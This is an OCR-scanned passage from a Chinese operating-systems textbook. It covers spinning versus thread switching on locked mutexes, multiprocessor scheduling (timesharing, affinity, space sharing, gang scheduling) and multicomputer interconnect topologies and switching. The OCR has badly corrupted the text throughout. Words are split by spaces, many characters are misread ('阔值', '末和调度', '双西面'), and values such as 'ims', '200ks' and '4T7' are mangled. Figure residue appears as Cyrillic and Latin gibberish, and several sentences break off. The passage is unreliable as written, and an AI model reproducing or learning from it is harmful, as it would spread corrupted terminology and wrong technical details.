不 是 等 待 。 有关 是 进行 自 旋 还 是 进行 线程 切换 的 问题 则 是 许多 研究 课题 的 内 容 ， 下 面 会 讨论 其 中 的 一 部 分 。 
请 注意 ， 这 类 问题 在 单 处 理 机 中 是 不 存在 的 ， 因为 没有 另 一 个 CPU 释放 锁 ， 那 么 自 旋 就 没有 任何 意义 。 如 
果 一 个 线程 试图 取得 锁 并 且 失 败 ， 那 么 它 总 是 被 阻塞 ， 这 样 锁 的 所 有 者 有 机 会 运行 和 释放 该 锁 。 

假设 自 旋 和 进行 线程 切换 都 是 可 行 的 选择 ， 则 可 进行 如 下 的 权衡 。 自 旋 直接 浪费 了 CPU 周期 。 重 复 
地 测试 锁 并 不 是 高 效 的 工作 。 不 过 ， 切 换 也 浪费 了 CPU 有 周期 ， 因为 必须 保存 当前 线程 的 状态 ， 必 须 获得 
保护 就 绪 链 表 的 锁 ， 还 必须 选择 一 个 线程 ， 必 须 装 入 其 状态 ， 并 且 使 其 开始 运行 。 更 进一步 来 说 ， 该 
CPU 高 速 缓存 还 将 包含 所 有 不 合适 的 高 速 缓存 块 ， 因此 在 线程 开始 运行 的 时 候 会 发 生 很 多 代价 昂贵 的 高 
速 缓存 未 命中 。TLB 的 失效 也 是 可 能 的 。 最 后 ， 会 发 生 返 回 至 原来 线程 的 切换 ， 随 之 而 来 的 是 更 多 的 高 
速 缓存 未 命中 。 花费 在 这 两 个 线程 间 来 回 切换 和 所 有 高 速 缓存 未 命中 的 周期 时 间 都 浪费 了 。 

如 果 预 先知 道 互 斥 信 号 量 通常 被 持 有 的 时 间 ， 比 如 是 50us， 而 从 当前 线程 切换 需要 1ms， 稍 后 切换 
返回 还 需 ims， 那 么 在 互 斥 信号 量 上 自 旋 则 更 为 有 效 。 另 一 方面 ， 如 果 互 斥 信号 量 的 平均 保持 时 间 是 
10ms， 那 就 值得 忍受 线程 切换 的 麻烦 。 问 题 在 于 ， 临界 区 在 这 个 期 间 会 发 生 相当 大 的 变化 ， 所 以 ， 哪 一 
种 方法 更 好 些 呢 ? 

有 一 种 设计 是 总 是 进行 自 旋 。 第 二 种 设计 方案 则 总 是 进行 切换 。 而 第 三 种 设计 方案 是 每 当 遇 到 一 个 
锁 住 的 互 斥 信号 量 时 ， 就 单独 做 出 决定 。 在 必须 做 出 决定 的 时 刻 ， 并 不 知道 自 旋 和 切换 哪 一 种 方案 更 好 ， 
但 是 对 于 任何 给 定 的 系统 ， 有 可 能 对 其 所 有 的 有 关 活 动 进行 跟踪 ， 并 且 随 后 进行 离线 分 析 。 然 后 就 可 以 
确定 哪个 决定 最 好 及 在 最 好 情形 下 所 浪费 的 时 间 。 这 种 事后 算法 (hindsight algorithm) 成 为 对 可 行 算法 
进行 测量 的 基准 评测 标准 。 

已 有 研究 人 员 对 上 述 这 一 问题 进行 了 研究 (Karlin 等 人 ，1989，Karlin 等 人 ，1991， Ousterhout, 
1982)。 多 数 的 研究 工作 使 用 了 这 样 一 个 模型 ， 一 个 未 能 获得 五 斥 信号 量 的 线程 自 旋 一 段 时 间 。 如 果 时 间 
超过 某 个 阔 值 ， 则 进行 切换 。 在 某 些 情形 下 ， 该 阔 值 是 一 个 定 值 ， 典型 值 是 切换 至 另 一 个 线程 再 切换 回 
来 的 开销 。 在 另 一 些 情形 下 ， 该 阔 值 是 动态 变化 的 ， 它 取决 于 所 观察 到 的 等 待 互 斥 信号 量 的 历史 信息 。 

在 系统 跟踪 若干 最 新 的 自 旋 时 间 并 且 假 定 当前 的 情形 可 能 会 同 先前 的 情形 类 似 时 ， 就 可 以 得 到 最 好 
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的 结果 。 例 如 ， 假 定 还 是 1ms 切 换 时 间 ， 线 程 自 旋 时 间 最 长 为 2ms， 但 是 要 观察 实际 上 自 旋 了 多 长 时 间 。 
如 果 线 程 未 能 获取 锁 ， 并 且 发 现在 之 前 的 三 轮 中 ， 平 均等 待 时 间 为 200ks， 那 么 ， 在 切换 之 前 就 应 该 先 
自 旋 2ms。 但 是 ， 如 果 发 现在 先前 的 每 次 尝试 中 ， 线 程 都 自 旋 了 整整 2ms， 则 应 该 立即 切换 而 不 再 自 旋 。 
更 多 的 细节 可 以 在 (Karlin 等 人 ，1991) 中 找到 。 


8.1.4 多 处 理 机 调度 

在 探讨 多 处 理 机 调度 之 前 ， 需 要 确定 调度 的 对 象 是 什么 。 过 去 ， 当 所 有 进程 都 是 单个 线程 的 时 候 ， 
调度 的 单位 是 进程 ， 因 为 没有 其 他 什么 可 以 调度 的 。 所 有 的 现代 操作 系统 都 支持 多 线程 进程 ， 这 让 调度 
变 得 更 加 复杂 。 

线程 是 内 核 线程 还 是 用 户 线程 至 关 重要 。 如 果 线程 是 由 用 户 空间 库 维护 的 ， 而 对 内 核 不 可 见 ， 那 么 
调度 一 如 既往 的 基于 单个 进程 。 如 果 内 核 并 不 知道 线程 的 存在 ， 它 就 不 能 调度 线程 。 

对 内 核 线程 来 说 ， 情 况 有 所 不 同 。 在 这 种 情况 下 所 有 线程 均 是 内 核 可 见 的 ， 内 核 可 以 选择 一 个 进程 
的 任 一 线程 。 在 这 样 的 系统 中 ， 发 展 趋势 是 内 核 选 择 线程 作为 调度 单位 ， 线 程 从 属 的 那个 进程 对 于 调度 
算法 只 有 很 少 的 (乃至 没有 ) 影响 。 下 面 我 们 将 探讨 线程 调度 ， 当 然 ， 对 于 一 个 单线 程 进程 (single- 
threaded process) 系统 或 者 用 户 空 间 线程 ， 调 度 单位 依然 是 进程 。 

进程 和 线程 的 选择 并 不 是 调度 中 的 惟一 问题 。 在 单 处 理 机 中 ,调度 是 一 维 的 。 惟 一 必须 (不 断 重复 地 ) 
回答 的 问题 是 :“ 接 下 来 运行 的 线程 应 该 是 哪 一 个 ? ”而 在 多 处 理 机 中 ， 调 度 是 二 维 的 。 调 度 程序 必须 决 
定 哪 一 个 进程 运行 以 及 在 哪 一 个 CPU 上 运行 。 这 个 在 多 处 理 机 中 增加 的 维 数 大 大 增加 了 调度 的 复杂 性 。 

另 一 个 造成 复杂 性 的 因素 是 ， 在 有 些 系统 中 所 有 的 线程 是 不 相关 的 ， 而 在 另外 一 些 系统 中 它们 是 成 
组 的 ， 同 属于 同一 个 应 用 并 且 协 同 工 作 。 前 一 种 情形 的 例子 是 分 时 系统 ， 其 中 独立 的 用 户 运行 相互 独立 
的 进程 。 这 些 不 同 进程 的 线程 之 间 没 有 关系 ， 因 此 其 中 的 每 一 个 都 可 以 独立 调度 而 不 用 考虑 其 他 的 线程 。 

后 一 种 情形 的 例子 通常 发 生 在 程序 开发 环境 中 。 大 型 系统 中 通常 有 一 些 供 实际 代码 使 用 的 包含 宏 、 
类 型 定义 以 及 变量 声明 等 内 容 的 头 文件 。 当 一 个 头 文件 改变 时 ， 所 有 包含 它 的 代码 文件 必须 被 重新 编译 。 
通常 make 程 序 用 于 管理 开发 工作 。 调 用 make 程 序 时 ， 在 考虑 了 头 文件 或 代码 文件 的 修改 之 后 ， 它 仅 编 
译 那 些 必须 重新 编译 的 代码 文件 。 仍 然 有 效 的 目标 文件 不 再 重新 生成 。 

make 的 原始 版 本 是 顺序 工作 的 ， 不 过 为 多 处 理 机 设计 的 新 版 本 可 以 一 次 启动 所 有 的 编译 。 如 果 需 
要 10 个 编译 ， 那 么 迅速 对 9 个 进行 调度 而 让 最 后 一 个 在 很 长 的 时 间 之 后 才 进行 的 做 法 没有 多 大 意义 ， 因 
为 直到 最 后 一 个 线程 完毕 之 后 用 户 才 感 觉 到 工作 完成 了 。 在 这 种 情况 下 ， 将 进行 编译 的 线程 看 作 一 组 ， 
并 在 对 其 调度 时 考虑 到 这 一 点 是 有 意义 的 。 

1. 分 时 

让 我 们 首先 讨论 调度 独立 线程 的 情况 。 稍 后 ， 我 们 将 考虑 如 何 调度 相关 的 线程 。 处 理 独 立 线程 的 最 
简单 算法 是 ， 为 就 绪 线程 维护 一 个 系统 级 的 数据 结构 ， 它 可 能 只 是 一 个 链表 ， 但 更 多 的 情况 下 可 能 是 对 
应 不 同 优先 级 一 个 链表 集合 ， 如 图 8-12a 所 示 。 这 里 16 个 CPU 正 在 忙碌 ， 有 不 同 优先 级 的 14 个 线程 在 等 
待 运行 。 第 一 个 将 要 完成 其 当前 工作 (或 其 线程 将 被 阻塞 ) 的 CPU 是 CPU 4， 然 后 CPU 4 锁 住 调度 队列 
(scheduling queue) 并 选择 优先 级 最 高 的 线程 A， 如 图 8-12b 所 示 。 接 着 ，CPU 12 空闲 并 选择 线程 B ， 
参见 图 8-12c。 只 要 线程 完全 无 关 ， 以 这 种 方式 调度 是 明智 的 选择 并 且 其 很 容易 高 效 地 实现 。 

由 所 有 CPU 使 用 的 单个 调度 数据 结构 分 时 共享 这 些 CPU， 正 如 它们 在 一 个 单 处 理 机 系统 中 那样 。 它 
还 支持 自动 负载 平衡 ， 因 为 决 不 会 出 现 一 个 CPU 空闲 而 其 他 CPU 过 载 的 情况 。 不 过 这 一 方法 有 两 个 缺点 ， 
一 个 是 随 着 CPU 数量 增加 所 引起 的 对 调度 数据 结构 的 潜在 竞争 ， 二 是 当 线程 由 于 IO 阻塞 时 所 引起 上 下 
文 切 换 的 开销 (overhead), 

在 线程 的 时 间 片 用 完 时 ， 也 可 能 发 生 上 下 文 切换 。 在 多 处 理 机 中 它 有 一 些 在 单 处 理 机 中 不 存在 的 属 
性 。 假 设 某 个 线程 在 其 时 间 片 用 完 时 持 有 一 把 自 旋 锁 。 在 该 线程 被 再 次 调度 并 且 释 放 该 锁 之 前 ， 其 他 等 
待 该 自 旋 锁 的 CPU 只 是 把 时 间 浪 费 在 自 旋 上 。 在 单 处 理 机 中 ， 极 少 采用 自 旋 锁 ， 因 此 ， 如 果 持 有 互 斥 信 
号 量 的 一 个 线程 被 挂 起 ， 而 另 一 个 线程 启动 并 试图 获取 该 互 斥 信号 量 ， 则 该 线程 会 立即 被 阻塞 ， 这 样 只 
浪费 了 少量 时 间 。 

为 了 避免 这 种 异常 情况 ， 一 些 系 统 采用 各 能 调度 (smart scheduling) 的 方法 ， 其 中 ， 获 得 了 自 旋 锁 
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的 线程 设置 一 个 进程 范围 内 的 标志 以 表示 它 目前 拥有 了 一 个 自 旋 锁 (Zahorjan 等 人 ，1991)。 当 它 释放 
该 自 旋 锁 时 ， 就 清除 这 个 标志 。 这 样 调 度 程序 就 不 会 停止 持 有 自 旋 锁 的 线程 ， 相 反 ， 调 度 程序 会 给 予 稍 
微 多 一 些 的 时 间 让 该 线程 完成 临界 区 内 的 工作 并 释放 自 旋 锁 。 
ona [о] [т] [2] [5] 回 口 回 回 
СОТ ео paan CPU 12 
回回 回回 o 回回 回回 =й 
2] [3] [14] [5] =н 


优先 级 


оз уоһло ч 


а) 
图 8-12 使 用 单一 数据 结构 调度 一 个 多 处 理 机 


调度 中 的 另 一 个 主要 问题 是 ， 当 所 有 CPU 平等 时 ， 某 些 CPU 更 平等 。 特 别 是 ， 当 线程 A 已 经 在 CPU 
k 上 运行 了 很 长 一 段 时 间 时 ，CPU k 的 高 速 缓存 装 满 了 A 的 块 。 若 A 很 快 重新 开始 运行 ， 那 么 如 果 它 在 
CPU k 上 运行 性 能 可 能 会 更 好 一 些 ， 因 为 的 高 速 缓存 也 许 还 存 有 A 的 一 些 块 。 预 装 高 速 缓存 块 将 提高 高 
速 缓存 的 命中 率 ， 从 而 提高 了 线程 的 速度 。 另 外 ，TLB 也 可 能 含有 正确 的 页 面 ， 从 而 减少 了 TLB 失 效 。 

有 些 多 处 理 机 考虑 了 这 一 因素 ， 并 使 用 了 所 谓 末 和 调度 (affinity scheduling) (Vaswani 和 Zahorjan， 
1991)。 其 基本 思想 是 ， 尽 量 使 一 个 线程 在 它 前 一 次 运行 过 的 同一 个 CPU 上 运行 。 创 建 这 种 亲和力 
(affinity) 的 一 种 途径 是 采用 一 种 两 级 调度 算法 (two-level scheduling algorithm)。 在 一 个 线程 创建 时 ， 
它 被 分 给 一 个 CPU， 例 如 ， 可 以 基于 哪 一 个 CPU 在 此 刻 有 最 小 的 负载 。 这 种 把 线程 分 给 CPU 的 工作 在 算 
法 的 顶层 进行 ， 其 结果 是 每 个 CPU 获得 了 自己 的 线程 集 。 

线程 的 实际 调度 工作 在 算法 的 底层 进行 。 它 由 每 个 CPU 使 用 优先 级 或 其 他 的 手段 分 别 进行 。 通 过 试 
图 让 一 个 线程 在 其 生命 周期 内 在 同一 个 CPU 上 运行 的 方法 ， 高 速 缓存 的 亲和力 得 到 了 最 大 化 。 不 过 ， 如 
果 某 一 个 CPU 没有 线程 运行 ， 它 便 选 取 另 一 个 CPU 的 一 个 线程 来 运行 而 不 是 空转 。 

两 级 调度 算法 有 三 个 优点 它 把 负载 大 致 平均 地 分 配 在 可 用 的 CPU 上 ， 第 二 ， 它 尽 可 能 发 挥 
了 高 速 缓存 亲和力 的 优势 ， 第 三 ， 通 过 为 每 个 CPU 提供 一 个 私有 的 就 绪 线程 链表 ， 使 得 对 就 结 线程 链表 
的 竞争 减 到 了 最 小 ， 因 为 试图 使 用 另 一 个 CPU 的 就 绪 线程 链表 的 机 会 相对 较 小 。 

2. 空间 共享 

当 线程 之 间 以 某 种 方式 彼此 相关 时 ， 可 以 使 用 其 他 多 处 理 机 调度 方法 。 前 面 我 们 叙述 过 的 并 行 
make 就 是 一 个 例子 。 经 常 还 有 一 个 线程 创建 多 个 共同 工作 的 线程 的 情况 发 生 。 例 如 当 一 个 进程 的 多 个 线 
程 间 频 繁 地 进行 通信 ， 让 其 在 同一 时 间 执 行 就 显得 尤为 重要 。 在 多 个 CPU 上 同时 调度 多 个 线程 称 为 空间 
共享 (space sharing), 

最 简单 的 空间 共享 算法 是 这 样 工 作 的 。 假 设 一 组 相关 的 线程 是 一 次 性 创建 的 。 在 其 创建 的 时 刻 ， 调 
度 程序 检查 是 否 有 同 线程 数量 一 样 多 的 空 闪 CPU 存 在 。 如 果 有 ， 每 个 线程 获得 各 自 专用 的 CPU ( 非 多 道 
程序 处 理 ) 并 且 都 开始 运行 。 如 果 没 有 足够 的 CPU， 就 没有 线程 开始 运行 ， 直 到 有 足够 的 CPU 时 为 止 。 
每 个 线程 保持 其 CPU 直 到 它 终止 ， 并 且 该 CPU 被 送 回 可 用 CPU 池 中 。 如 果 一 个 线程 在 1O 上 阻塞 ， 它 继续 
保持 其 CPU， 而 该 CPU 就 空 亲 直 到 该 线程 被 唤醒 。 在 下 一 批 线程 出 现时 ， 应 用 同样 的 算法 。 

在 任何 一 个 时 刻 ， 全 部 CPU 被 静态 地 划分 成 若干 个 分 区 ， 每 个 分 区 都 运行 一 个 进程 中 的 线程 。 例如 ， 
在 图 8-13 中 ， 分 区 的 大 小 是 4、6、8 和 12 个 CPU， 有 两 个 CPU 没有 分 配 。 随 着 时 间 的 流逝 ， 新 的 线程 创 
建 ， 旧 的 线程 终止 ，CPU 分 区 大 小 和 数量 都 会 发 生变 化 。 
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必须 进行 周期 性 的 调度 决策 。 在 单 处 理 机 系统 中 ， 最 短 作业 优先 是 批 处 理 调度 中 知名 的 算法 。 在 多 
处 理 机 系统 中 类 似 的 算法 是 ， 选 择 需要 最 少 лору 
的 CPU 有 周期 数 的 线程 ， 也 就 是 其 CPU 周期 数 mor ~E E 
x 运行 时 间 最 小 的 线程 为 候选 线程 。 然 而 ， EE 
在 实际 中 ， 这 一 信息 很 难得 到 ， 因 此 该 算 法 6 人 CPU ТЕЕ. 
难以 实现 。 事 实 上 ， 研 究 表明 ， 要 胜 过 先 来 的 分 区 
先 服务 算法 是 非常 困难 的 (Krueger 等 人 ， [ы] [е] 
1994), 未 分 配 的 CPU 

在 这 个 简单 的 分 区 模型 中 ， 一 个 线程 Ex ү Й ути 
请 求 一 定数 量 的 CPU， 然 后 或 者 全 部 得 到 它 。 图 813 一 个 32 个 CPU 的 集合 被 分 成 4 个 分 区 ， 两 个 CPU 可 用 
们 或 者 一 直 等 到 有 足够 数量 的 CPU 可 用 为 止 。 另 一 种 处 理 方式 是 主动 地 管理 线程 的 并 行 度 。 管 理 并 行 度 
的 一 种 途径 是 使 用 一 个 中 心服 务 器 ， 用 它 跟踪 哪些 线程 正在 运行 哪些 线程 希望 运行 以 及 所 需 CPU 的 最 
小 和 最 大 数量 (Tucker 和 Gupta，1989)。 每 个 应 用 程序 周期 性 地 询问 中 心服 务 器 有 多 少 个 CPU 可 用 。 然 
后 它 调整 线程 的 数量 以 符合 可 用 的 数量 。 例 如 ， 一 台 Web 服 务 器 可 以 5、10、20 或 任何 其 他 数量 的 线程 
并 行 运行 。 如 果 它 当前 有 10 个 线程 突然， 系统 对 CPU 的 需求 增加 了 ， 于 是 它 被 通知 可 用 的 CPU 数 量 减 
到 了 5 个 ， 那 么 在 接 下 来 的 5 个 线程 完成 其 当前 工作 之 后 ， 它 们 就 被 通知 退出 而 不 是 给 予 新 的 工作 。 这 种 
机 制 允 许 分 区 大 小 动态 地 变化 ， 以 便 与 当前 负载 相 匹配 ， 这 种 方法 优 于 图 8-13 中 的 固定 系统 。 

3. 群 调度 (Gang Scheduling) 

空间 共享 的 一 个 明显 优点 是 消除 了 多 道 程序 设计 ， 从 而 消除 了 上 下 文 切换 的 开销 。 但 是 ， 一 个 同样 
明显 的 缺点 是 当 CPU 被 阻塞 或 根本 无 事 可 做 时 时 间 被 浪费 了 ， 只 有 等 到 其 再 次 就 结 。 干 是， 人们 寻找 既 
可 以 调度 时 间 又 可 以 调度 空间 的 算法 ， 特 别 是 对 于 要 创建 多 个 线程 而 这 些 线程 通常 需要 彼此 通信 的 线程 。 

为 了 考察 一 个 进程 的 多 个 线程 被 独立 调度 时 会 出 现 的 问题 ， 设 想 一 个 系统 中 有 线程 A 和 A 属于 进程 
A， 而 线程 Bu 和 Bi 属于 进程 B。 线 程 A 和 Bu 在 CPU 0 上 分 了 时， 而 线程 A, 和 B, 在 CPU 1 上 分 时 。 线 程 Av 和 A， 
需要 经 常 通信 。 共 通信 模式 是 ，Ao 送 给 A 一 个 消息 ， 然 后 A 回 送 给 A 一 个 应 答 ， 紧 跟 的 是 另 一 个 这 样 的 
序列 。 假 设 正好 是 Ao 和 BB 首先 开始 ， 如 图 8-14 所 示 。 


12 个 CPU 的 分 区 


线程 A 运行 
А = в, 
CPU1 i 
时 间 о 100 20 эю 400 РЯ өю 


图 8-14 进程 A 的 两 个 异步 运行 的 线程 间 的 通信 


在 时 间 片 9，Ao 发 给 A, 一 个 请 求 ， 但 是 直到 A, 在 开始 于 100ms 的 时 间 片 ! 中 开始 运行 时 它 才 得 到 该 消 
息 。 它 立即 发 送 一 个 应 答 ， 但 是 直到 Ao 在 200ms 再 次 运行 时 它 才 得 到 该 应 答 。 最 终结 果 是 每 200ms 一 个 
请 求 - 应 答 序列 。 这 个 结果 并 不 好 。 

这 一 问题 的 解决 方案 是 群 调度 (gang scheduling) ， 它 是 协同 调度 (co-scheduling) (Outsterhout， 
1982) 的 发 展 产物 。 群 调度 由 三 个 部 分 组 成 : 

1) 把 一 组 相关 线程 作为 一 个 单位 ， 即 一 个 群 (gang) ， 一 起 调度 。 

2) 一 个 群 中 的 所 有 成 员 在 不 同 的 分 时 CPU 上 同时 运行 。 

3) 群 中 的 所 有 成 员 共同 开始 和 结束 其 时 间 片 。 
使 群 调度 正确 工作 的 关键 是 ， 同 步调 度 所 有 的 CPU。 这 意味 着 把 时 间 划 分 为 离散 的 时 间 片 ， 如 图 8-14 
中 所 示 。 在 每 一 个 新 的 时 间 片 开始 时 ， 所 有 的 CPU 都 重新 调度 ， 在 每 个 CPU 上 都 开始 一 个 新 的 线程 。 在 
后 续 的 时 间 片 开始 时 ， 另 一 个 调度 事件 发 生 。 在 这 之 间 ， 没 有 调度 行为 。 如 果 某 个 线程 被 阻 察 ， 它 的 
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CPU 保持 空间 ， 直 到 对 应 的 时 间 片 结束 为 止 
有 关 群 调度 是 如 何 工作 的 例子 在 图 8-15 中 给 出 。 图 8-15 中 有 一 台 带 6 个 CPU 的 多 处 理 机 ， 由 5 个 进程 人 
到 BE 使 用 ， 总 共有 24 个 就 绪 线 程 。 在 时 间 档 (time 
slot) 0， 线 程 Au 至 A, 被 调度 运行 。 在 时 间 模 1， 调 
度 线程 Bs、B,、Bs、C。、C, 和 C; 被 调度 运行 。 在 Н 
ЯНО, HERDS RRR EZT. Ф006 j 
MERRTE, EMMI, ARRE 3 
ЖИТ, MHEARA 0 一 样 ， 以 此 类 推 。 ч 
6| 
7 


群 调度 的 思想 是 ， 让 一 个 进程 的 所 有 线程 一 
起 运行 ， 这 样 ， 如 果 其 中 一 个 线程 向 另 一 个 线程 
发 送 请 求 ， 接 受 方 几乎 会 立即 得 到 消息 ， 并 且 几 _ 
平 能 够 立即 应 答 。 在 图 8-15 中 ， 由 于 进程 的 所 有 108-15 [Їй 
线程 在 同一 个 时 间 片 内 一 起 运行 ， 它 们 可 以 在 一 
个 时 间 片 内 发 送 和 接受 大 量 的 消息 ， 从 而 消除 了 图 8-14 中 的 问题 。 


8.2 多 计算 机 


多 处 理 机 流行 和 有 吸引 力 的 原因 是 ， 它 们 提供 了 -个 简单 的 通信 模型 ， 所 有 CPU 共 齐 一 个 公用 存储 
器 。 进 程 可 以 向 存储 器 写 消息 ， 然 后 被 其 他 进程 读 取 。 可 以 使 用 互 斥 信号 量 、 信号 最 、 管 得 (monitor) 


和 其 他 适合 的 技术 实现 同步 。 惟 一 美中不足 的 是 . 大 型 多 处 理 机 构造 困难 ， 因 而 造价 高 昂 。 

为 了 解决 这 个 问题 ， 人 们 在 多 计算 机 (multicomputers) 领域 中 进行 了 很 多 研究 。 多 计算 机 是 紧 灼 
合 CPU， 不 共享 存储 器 。 每 台 计 算 机 有 自己 的 存储 器 ， 如 图 8-1b 所 示 。 众所周知 ， 这 些 系 统 有 各 种 其 他 
的 名 称 ， 如 机 群 计算 机 (cluster computers) 以 及 工作 站 机 群 (Clusters of Workstations, COWS), 

多 计算 机 容易 构造 ， 因 为 其 基本 部 件 只 一 台 配 有 高 性 能 网 络 接口 卡 的 PC 裸 机 。 当 然 ， 获 得 高 性 


在 下 面 几 节 中 ， 我 们 将 首先 简要 地 介绍 多 计算 机 硬件 ， 特别 是 互 连 硬件 。 然 后 


， 我 们 将 讨论 软件 ， 
从 低层 通信 软件 开始 ， 接 着 是 高 层 通 信 软 件 。 我 们 还 将 讨论 在 没有 共享 存储 器 的 系统 中 实现 共享 在 储 器 
的 方法 。 最 后 ， 我 们 将 讨论 调度 和 负载 平衡 的 问题 。 
8.2.1 多 计算 机 硬件 

一 台 多 计算 机 的 基本 节点 包括 一 个 CPU、 存 储 器 、 一 个 网 络 接口， 有 时 还 有 一 个 硬盘 。 节 点 可 以 封 
装 在 标准 的 PC 机 箱 中 ， 不 过 通常 没有 图 像 适 配 卡 、 显 示 器 、 键盘 和 鼠标 等 。 在 某 些 情况 下 ，PC 机 中 有 
一 块 ? 通 道 或 4 通道 的 多 处 理 机 主板 ， 可 能 带 有 双核 或 者 四 核 芯 片 而 不 是 单个 CPU， 不 过 为 了 简化 问题 , 


我 们 假设 每 个 节点 有 一 个 甚 它 上 千 个 节点 连接 在 一 起 组 成 一 个 多 计算 机 。 下 面 我 们 将 
介绍 一 些 关于 硬件 如 何 组 织 的 内 容 。 
1. 互 连 技术 


在 每 个 节点 上 有 一 块 网 卡 ， 带 有 一 根 或 两 根 从 网 卡 上 接 出 的 电缆 (或 光纤 )。 这 些 电缆 或 者 连 到 其 
他 的 节点 上 ， 或 者 连 到 交换 机 上 。 在 小 型 系统 中 ， 可 能 会 有 一 个 按照 图 8-16a 的 星 型 拓扑 结构 连接 所 有 
节点 的 的 交换 机 。 现代 交换 型 以 太 网 就 采用 了 这 种 拓扑 结构 。 

作为 单一 交换 机 设计 的 另 一 种 选择 ， 节 点 可 以 组 成 一 个 环 ， 有 两 根 线 从 网 络 接口 卡 上 出 来 ， 一 根 去 
连接 左面 的 节点 ， 另 一 根 去 连接 右面 的 节点 ， 如 图 8-16b 所 示 。 在 这 种 拓扑 结构 中 不 需要 交换 机 ， 所 以 
图 中 也 没有 。 

图 8-16c 中 的 网 格 (grid 或 mesh) 是 一 种 在 许多 商业 系统 中 应 用 的 二 维 设计 。 它 相当 规整 ， 而 且 容 
易 扩展 为 大 规模 系统 。 这 种 系统 有 一 个 直径 (diameter), 即 在 任意 两 个 节点 之 间 的 最 长 路 径 ， 并 且 该 值 
只 按照 节点 数目 的 平方 根 增 加 。 网 格 的 变种 是 双 西 面 (double torus) ， 如 图 8-16d 所 示 ， 这 是 一 种 边 连通 


310 #8Ж 


的 网 格 。 这 种 拓扑 结构 不 仅 较 网 格 具有 更 强 的 容错 能 力 而 且 其 直径 也 比较 小 ， 因 为 对 角 之 间 的 通信 只 需 
要 两 跳 。 

图 8-16e 中 的 立方 体 (cube) 是 一 种 规则 的 三 维 拓扑 结构 。 我 们 展示 的 是 2 x 2 x 2 立方 体 ， 更 一 般 的 
情形 则 是 kxkxk 立 方 体 。 在 图 8-16f 中 ， 是 一 种 用 两 个 三 维 立 方 体 加 上 对 应 边 连 接 所 组 成 四 维 立 方 体 。 
我 们 可 以 仿照 图 8-16f 的 结构 并 且 连 接 对 应 的 节点 以 组 成 四 个 立方 体 组 块 来 制作 五 维 立方 体 。 为 了 实现 六 维 ， 
可 以 复制 四 个 立方 体 的 块 并 把 对 应 节点 互 连 起 来 ， 以 此 类 推 。 以 这 种 形式 组 成 的 " 维 立 方 体 称 为 超 立 方 体 
(hypercube)。 许 多 并 行 计 算 机 采用 这 种 拓扑 结构 ， 因 为 其 直径 随 着 维 数 的 增加 线性 增长 。 换 名 话说， 直径 是 
节点 数 的 自然 对 数 ， 例 如 ， 一 个 10 维 的 超 立 方 体 有 1024 个 节点 ， 但 是 其 直径 仅 为 10， 有 着 出 色 的 延迟 特性 。 
注意 ， 与 之 相反 的 是 ，1024 的 节点 如 果 按 照 32 x 32 网 格 布局 则 其 直径 为 62， 较 超 立 方 体 相差 了 六 倍 多 。 对 于 
超 立 方 体 而 言 ， 获 得 较 小 直径 的 代价 是 扇 出 数量 (fanout) 以 及 由 此 而 来 的 连接 数量 (及 成 本 ) 的 大 量 增加 。 


жо 


图 8-16 各 种 互 连 拓扑 结构 :a) 单 交换 机 ，b) 环 ，c) 网 格 ，d) 双 凸 面 ，e) 立 方 体 ， 有 四维 超 立方 体 


在 多 计算 机 中 可 采用 两 种 交换 机 制 。 在 第 一 种 机 制 里 ， 每 个 消息 首先 被 分 解 ( 由 用 户 软件 或 网 络 接 
口 进 行 ) 成 为 有 最 大 长 度 限制 的 块 ， 称 为 包 (packet) 。 该 交换 机 制 称 为 存储 转发 包 交 接 (store-and- 
forward packet switching)， 由 源 网络 接口 卡 注入 到 第 一 个 交换 机 的 包 组 成 ， 如 图 8-17a 所 示 。 比 
特 串 一 次 进来 一 位 ， 当 整个 包 到 达 一 个 输入 缓冲 区 时 ， 它 被 复制 到 沿 着 其 路 径 通 向 下 一 个 交换 机 的 队列 
当中 ， 如 图 8-17b 所 示 。 当 包 到 达 目 标 节点 所 连接 的 交换 机 时 ， 如 图 8-17c 所 示 ， 该 包 被 复制 进入 目标 节 
点 的 网 络 接口 卡 ， 并 最 终 到 达 其 RAM。 


Cpu1 4 端口 输入 端口 
交换 机 нап 


ЕКЕ 
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图 8-17 存储 转发 包 交 换 


整个 包 
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尽管 存储 转发 包 交 换 灵活 且 有 效 ， 但 是 它 存在 通过 互连网 络 时 增加 时 延 (延迟 ) 的 问题 。 假 设 在 图 
8-17 中 把 一 个 包 传送 一 跳 所 花费 的 时 间 为 7 纳 秒 。 为 了 从 CPU 1 到 CPU 2， 该 包 必须 被 复制 四 次 (ЖА, 
至 C、 至 D 以 及 到 目标 CPU)， 而 且 在 前 一 个 包 完 成 之 前 ， 不 能 开始 有 关 的 复制 ， 所 以 通过 该 互连网 络 的 
时 延 是 4T7。 一 条 出 路 是 设计 一 个 网 络 ， 其 中 的 包 可 以 逻辑 地 划分 为 更 小 的 单元 。 只 要 第 - -个 单元 到 达 一 
个 交换 机 ， 它 就 被 转发 到 下 一 个 交换 机 ， 其 至 可 以 在 包 的 结尾 到 达 之 前 进行 。 可 以 想象 ， 这 个 传送 单元 
可 以 小 到 1 比特 。 

另 一 种 交换 机 制 是 电路 交接 (circuit switching) ， 它 包括 由 第 一 个 交换 机 建立 的 ， 通过 所 有 交换 机 
而 到 达 目 标 交换 机 的 一 条 路 径 。 一 旦 该 路 径 建立 起 来 ， 比特 流 就 从 源 到 目的 地 通过 整个 路 径 不 断 地 尽快 
输送 。 在 所 涉及 的 交换 机 中 ， 没 有 中 间 缓 串 。 电 路 交换 需要 有 一 个 建立 阶段 ， 它 需要 一 点 时 间 ， 但 是 一 
且 建 立 完成 ， 速 度 就 很 快 。 在 包 发 送 完毕 之 后 ， 该 路 径 必 须 被 拆除 。 电路 交换 的 一 种 变种 称 为 由 孔 路 由 
(wormhole routing)， 它 把 每 个 包 拆 成 子 包 ， 并 允许 第 一 个 子 包 在 整个 路 径 还 没有 完全 建立 之 前 就 开始 
流动 。 

2. 网 络 接口 

在 多 计算 机 中 ， 所 有 节点 里 都 有 一 块 播 卡 板 ， 它 包含 节点 与 互连网 络 的 连接 ， 这 使 得 多 计算 机 连 成 
一 体 。 这 些 板 的 构造 方式 以 及 它们 如 何 同 主 CPU 和 RAM 连 接 对 操作 系统 有 重要 影响 。 这 里 简要 地 介绍 一 
些 有 关 的 内 容 。 部 分 内 容 来 源 于 (Bhoedjang, 2000), 

事实 上 在 所 有 的 多 计算 机 中 ， 接 口 板 上 都 有 一 些 用 来 存储 进出 包 的 RAM 。 通常 ， 在 包 被 传送 到 第 
